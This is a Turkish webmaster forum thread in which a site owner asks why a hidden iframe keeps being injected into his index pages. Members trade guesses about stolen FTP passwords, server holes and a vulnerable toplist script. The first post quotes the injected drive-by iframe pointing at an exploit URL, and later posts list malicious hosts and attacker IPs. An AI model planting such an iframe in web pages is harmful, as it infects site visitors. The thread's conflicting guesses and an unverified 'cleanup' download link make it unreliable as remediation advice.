Bu nasil bir Hack türüdür

Question

Merhaba Arkadaslar

Bir kac gündür birileri siteme girip iframeler atiyor..
Sitem bir oyun sitesiydi, onarcade türü birsey.. ve aardvark toplist vardi..
Ve bi gün siteye girdigimde alta gizli yazilar eklendigini fark ettim, yani sira iframeler..

ve siteleri silip HTML attim, HTML sayfayada aynis ekil yaptilar...

acaba Crackli cuteftplerden mi aliyorlar sifreleri? yoksa baska bir virus türümü bu?

<iframe src='http://pynet.ws/exp/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Duygusal · Answer

kereviz adlı üyeden alıntı:						mesajı görüntüle									frame oy oy oy frameye yakalandıysan bittin kaspersky virüs programından geçir virüs oalrak algılıcak onları onar yap o kısmı siler 		çözümü yukarıda vermişim

yasarkemaldag · Answer

arkadaşlar pc ile mozilla ile alakası yok..
bunları server açıklarından yararlanarak bir serverdaki tüm indexlere ve klasörlerdeki indexlere iframe atıyorlar..
benim iki kere başıma geldi.

scriptini yeni dosyalar ile değiştir düzelir.

Alternatif · Answer

yasarkemaldag adlı üyeden alıntı:						mesajı görüntüle									arkadaşlar pc ile mozilla ile alakası yok..
bunları server açıklarından yararlanarak bir serverdaki tüm indexlere ve klasörlerdeki indexlere iframe atıyorlar..
benim iki kere başıma geldi.

scriptini yeni dosyalar ile değiştir düzelir. 		Server'a baglanip Yast'a girdim ve gerekli güvenlik güncellemelerini yaptim.. Php session acigi, güvenlik diye belirtmisti acaba ondan olabilir mi?

Server'da hangi aciktan faydalandigini nasil anliyoruz?
Ayrica servarda 120 GB dosya var bunlar'i degistirmem imkansiz... yada cekip tekrar yüklemem...

Bana nasil kurtuldugunu anlatirsan bende adimlarini takip ederim, bende server acigi olabilecegini düsündüm..

Selamlar

Ekstra · Answer

Aynı şey benimde başıma geldi..
pcne format at, tüm ftp şifrelerini değiştir, tüm iframe kodlarını kaldır.
serverdan kaynaklanmıyor, bilgisayarındaki tüm ftp şifrelerini alıp iframe kodlarını ekliyorlar.

Alternatif · Answer

Ekstra adlı üyeden alıntı:						mesajı görüntüle									Aynı şey benimde başıma geldi..
pcne format at, tüm ftp şifrelerini değiştir, tüm iframe kodlarını kaldır.
serverdan kaynaklanmıyor, bilgisayarındaki tüm ftp şifrelerini alıp iframe kodlarını ekliyorlar. 		hocam o kadar aradim tarafim benzer bir vakkaya rastlamadim.. bu dediklerini yaptim zaten, sadece neden olabilecegini anlamaya calisiyorum..

bi kac antivir. denedim ancak hic biri virus uyarisi vermedi, arkadasin dedigi olay daha mantikli geldi server acigi ancak server acigi ise bu kisiler ftp loglarinda nasil iz birakiyorlar...

neyse umarum cözüm bulur bu konu... sür ictim dilim yandi, amanin amman amman.. deme ye basladim bile

Ekstra · Answer

sitelerim 4 ayrı serverda barınıyor, serverdan kaynaklanmıyor.

yasarkemaldag · Answer

Ekstra adlı üyeden alıntı:						mesajı görüntüle									sitelerim 4 ayrı serverda barınıyor, serverdan kaynaklanmıyor. 		adamlar sizce ftp şifreleri ile tek tek dosyalara iframe ile uğraşırlarmı.ayrıca pc lerde virüs olsa kaspersky gibi bi anti virüs nasıl ötmeden durur.

bu anlık bir iş.
servera sızıyorlar tüm sitelerin indexlerine ve klasörlerdeki indexlere virüslü iframe i atıyorlar.genelde rus hackerlar yapıyor bunları ama soylarını tam olarak bilmiyorum...

alternatif arkadaşın sorusuna gelince, ben scriptleri yenileyerek çözmüştüm çok uğraştırıcı ama başka yol yoktu eğer daha inceden bir ayar ile yolu varsa sitedeki uzman arkadaşlar burada yardımcı olacaklardır.

Duygusal · Answer

Arkadaşlar Paniklenmeyin Ben kesin Çözüm yolu biliyorum.
 
aşağıdaki Linkten programı indirin.Dili Türkçeye çevirip Çoklu değiştirme diyin.Sonra Dosyalarınıza bulaşaniframe kodunu yazın 2. çubuğada Boşluk bırakın. İlk Önce C sürücünüzü temizleyinsonrada D sürücüsünü olay bitmiştir. 
 
'' http://uploaded.to/?id=b8dmyx ''
 
+rep +rep +rep  
 
not: Bu Virüs Yayan sitelere girdiğiniz için oluyordur sonrada ftpye veya pcnizdeki php ve html dosyalarının altına yerleşiyorlar.

kereviz · Answer

frame oy oy oy frameye yakalandıysan bittin kaspersky virüs programından geçir virüs oalrak algılıcak onları onar yap o kısmı siler

CaSt · Answer

Bende de aynısı oLdu 4-5 siteme dağıttı aynı iframe yi tüm index lerde temizledim ftp şifrelerini değiştim ve virüs taraması yaptım düzeldi kurtuldum o beladan inşallah sende kurtulursun

M3RT · Answer

adamlar güzel taktik yapmış ama

Marmara · Answer

ah ah... 1 haftadır neler çekiyorumşu lanet şeyden bi bilseniz...

Duygusal · Answer

Benim cevaptan yapan olmadımı? iki dk temizliyor hemen

Alternatif · Answer

Arkadaslar bilgisayarimda virus filan yok ve olsa ciyak ciyak öter awast ve virus bulastiri hicbir siteye girmiyor temkinli davaniyorum daha 15 gün önce format atmistim bir cok antivur ilede denedim...

Cutede FTPde 4 ayri hostun sifreleri kayitliydi. Ancak sadece kendi sunucuma girmisler ve kendi sunucumdaki sitelere iframe atmislar.. Bu tamamen server kaynakli diye düsünüyorum..

xammp localhosttaki hic bir dosyada yok bu iframe ve localde kurulu yaklasik 50 site var ve hepsine baktim, yok....

kisaca sunucuyu degistirmem lazim php 4.4.0 kullaniyorum, güncellemeside zor gibi...

umarim diger arkadaslar olmaz bu tür sey, anasi aglatiyorlar sitenin, onu birak googleden virus banida yiyor...

Alternatif · Answer

duygusal adlı üyeden alıntı:						mesajı görüntüle									Arkadaşlar Paniklenmeyin Ben kesin Çözüm yolu biliyorum.
 
aşağıdaki Linkten programı indirin.Dili Türkçeye çevirip Çoklu değiştirme diyin.Sonra Dosyalarınıza bulaşaniframe kodunu yazın 2. çubuğada Boşluk bırakın. İlk Önce C sürücünüzü temizleyinsonrada D sürücüsünü olay bitmiştir. 
 
'' virÃ¼s temizle.rar ... at uploaded.to - Free File Hosting, Free Image Hosting, Free Music Hosting, Free Video Hosting, ... ''
 
+rep +rep +rep  
 
not: Bu Virüs Yayan sitelere girdiğiniz için oluyordur sonrada ftpye veya pcnizdeki php ve html dosyalarının altına yerleşiyorlar. 		bi webmasterde olmasi gereken biryazilim, virus filan icin degil.. gelismis yazi,kod filan degistirici.. süpersin cok isime yarayacak

Elazığlı168 · Answer

aadvark toplistte remote file include açığı var diye biliyorum. Daha yeni bulundu..

Anti · Answer

Benim bildiğim kadarıyla sunucudaki açıktan yararlanıp tüm index lerin en altına kodları yerleştiriolar,Yani sorun sende deil sunucunda

aponal · Answer

ftp şifresi olsayda başka yerlerede koyabilirlerdi bunlar en alta atıyor kabak gibi görünüyo
 
diğer linkteki iframeli virus banada bulaşmıştı sanırım bulaşmadığı bir yer kalmamış
 
ben akıllandım tüm dosyaları rar lı hale getirdim kullanacağım zaman cıkartıyorum

Alternatif · Answer

ben basta sadece index.html dosyasini degistiebildiklerini söylemistim... yani ne chmod var nede baska bir dosya.. ve bu serverimde 3 domaine oluyor, ftp loglarinda malasia baglantilari tespit ettim. sanirim kullandigim FTP programindan yada servere bir cesit virus bulasmis.. sadece iframe degil, hidden texte atiyor bazen...

selamlar

aponal · Answer

benımde index.php dosyasına atmışlardı ama yerli bi site adresiydi sildim birdaha atan olmadı aynı şifreleri kullanıyorum sanırım bunu başka bi yolla atıyorlar
 
atılan kodda bu sitenin adresi vardı 
 
ciyara.gen.tr

Ufuk Gedik · Answer

proftpd değil pure-ftpd kullanın ftpd servisi olarak

Greyfurt · Answer

arkadaşlar bu kod eklenen sayfalarinizin izinlerinin durumu nedir ? 

chmod kaç ? izinleri düzenleyin sadece okuma kalsın

Alternatif · Answer

Lens adlı üyeden alıntı:						mesajı görüntüle									En iyisi mozilla kullanmak  		4 senedir mozilla kulaniyorum, ve bende virus oldugunuda sanmiyorum

Lens · Answer

En iyisi mozilla kullanmak

Alternatif · Answer

unoxxx adlı üyeden alıntı:						mesajı görüntüle									Geçmiş Olsun, bi bak istersen...
http://www.r10.net/webmaster-genel-k...us-dikkat.html 		Evet bu konuyu bastan sona kadar okudum ancak benim sorunumla uyusmuyor sanirim.. localde calisan tüm dosyalari kontrol ettim sorun yok ve arkadaslar bahs ettigi system32 bölümünde yeni eklenen dosyalari tarihine göre siraladim, awast disinda birsey yok.. bende linux server var.. ona bulasmis olabilir mi acaba?

unoxxx · Answer

Geçmiş Olsun, bi bak istersen...
http://www.r10.net/webmaster-genel-k...us-dikkat.html

bowfinger · Answer

bende virüs yüzünden buna benzer birşey oluyordu format atınca geçti...

Alternatif · Answer

kacar82 adlı üyeden alıntı:						mesajı görüntüle									şifre ile gireceklerini zannetmiyorum... 
 
Sadece tüm kalsörlerdeki index sayfalarına konuyor o kod... Hem şifre ile giriş yapılsa siteyi darmadapın ederler hemde tüm dosyalara koyarlar gibime geliyor... Otomatşik eklenitor bu site ama nasıl... İşte bende onu bilmiyorum... 		iyide adamlarin derdi PR olabilir... ve ellerinden geldigi kadar gizli calismaya calisiyorlar..

ftp loglarinda 4 yabanci baglanti var:

Edit....

ftp loglarinda:
203.223.158.101
154.79.232.72.static.reverse.layeredtech.com
203.121.69.158
216.255.182.106-custblock.intercage.com
bunlar yer aliyor...

Thu Jun 7 17:48:43 2007 0 203.121.69.158 3429 /srv/www/vhosts/oyuncuyum/httpdocs/index.php b _ o r oyncym ftp 0 * c
Thu Jun 7 17:48:45 2007 0 203.121.69.158 7628 /srv/www/vhosts/oyuncuyum/httpdocs/index.php b _ i r oyncym ftp 0 * c
Fri Jun 8 14:19:04 2007 0 203.223.158.101 7628 /srv/www/vhosts/oyuncuyum/httpdocs/index.php b _ o r oyncym ftp 0 * c
Fri Jun 8 14:19:07 2007 1 203.223.158.101 7730 /srv/www/vhosts/oyuncuyum/httpdocs/index.php b _ i r oyncym ftp 0 * c
Fri Jun 8 14:19:08 2007 0 203.223.158.101 0 /srv/www/vhosts/oyuncuyum/httpsdocs/index.html b _ o r oyncym ftp 0 * c
Fri Jun 8 14:19:10 2007 0 203.223.158.101 102 /srv/www/vhosts/oyuncuyum/httpsdocs/index.html b _ i r oyncym ftp 0 * c

Ve sifre ile girdikleri kesinlesiyor gibime geldi..

Peki sen CuteFTP kullandin mi hic?

kacar82 · Answer

şifre ile gireceklerini zannetmiyorum... 
 
Sadece tüm kalsörlerdeki index sayfalarına konuyor o kod... Hem şifre ile giriş yapılsa siteyi darmadapın ederler hemde tüm dosyalara koyarlar gibime geliyor... Otomatşik eklenitor bu site ama nasıl... İşte bende onu bilmiyorum...

Alternatif · Answer

Evet benimde 2 sitem googleden stopbadware.org sitesi tarafindan erisimine engel konuldu...

ben crackli cute ftpden olabilecegini tahmin ediyorum, cünkü php,html dinlemeden dalabiliyorlar... ve plesk'de domaini durdurdugum zaman müdahale edemiyorlar.. yani sifreyle giriyorlar snairim... ftp loglarini bi kontrol etmek gerek...

kacar82 · Answer

bendede bu der var bendeki site ise "t-error.us" sitesi... kod aynı site farklı...

Bu işe kesin çözümü çok aradım olmadı... Burada bi bilen çıkar umarım...

Aman dikkat bu kod index sayfalarına ya kendini yerleştiriyor ve googleden banlanabilirsin... benim sitemin biri banlandı bu yüzden... Durmadan siteleri kontrol eiyorum...

Panoroya oldu nerdeyse... Tekrar ban yiyecem diye...
 
Format atın diyebilirler... Ben FORMAt attım nafile...

Cem1 · Answer

pc ine virüs bulaşmış olabilir